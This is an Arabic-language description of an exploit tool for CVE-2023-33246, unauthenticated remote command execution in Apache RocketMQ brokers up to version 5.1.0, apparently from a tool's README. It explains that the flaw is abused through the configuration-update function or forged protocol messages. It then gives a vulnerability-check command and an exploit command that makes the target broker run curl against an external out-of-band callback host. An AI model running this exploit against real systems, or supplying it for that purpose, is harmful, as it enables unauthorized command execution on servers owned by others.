
استغلال لثغرة CVE-2023-33246 تستهدف وسطاء Apache RocketMQ. ينفذ أوامر عشوائية عبر تحديث تهيئة غير مصادق عليه أو رسائل بروتوكول مزورة على الإصدارات الضعيفة 5.1.0 وما دونها.
CVE-2023-33246 استغلال تنفيذ الأوامر عن بُعد في RocketMQ
إصدارات RocketMQ 5.1.0 وما دونها معرضة لثغرة حقن الأكواد التعسفي. مكون Broker في RocketMQ مسرب على الشبكة الخارجية ويفتقد التحقق من الأذونات. يمكن للمهاجم استغلال هذه الثغرة باستخدام وظيفة تحديث التكوين لتنفيذ الأوامر كمستخدمي النظام الذي يعمل عليه RocketMQ. بالإضافة إلى ذلك، يمكن للمهاجم تحقيق نفس التأثير عن طريق تزوير محتوى بروتوكول RocketMQ.
فحص
./RocketMQRceCheck -host 127.0.0.1 -port 9876
استغلال
RocketMQ_RCE_EXPLOIT 127.0.0.1 10911 curl chw9ft72vtc00002z5k0ge6rz7eyyyyyb.oast.fun/test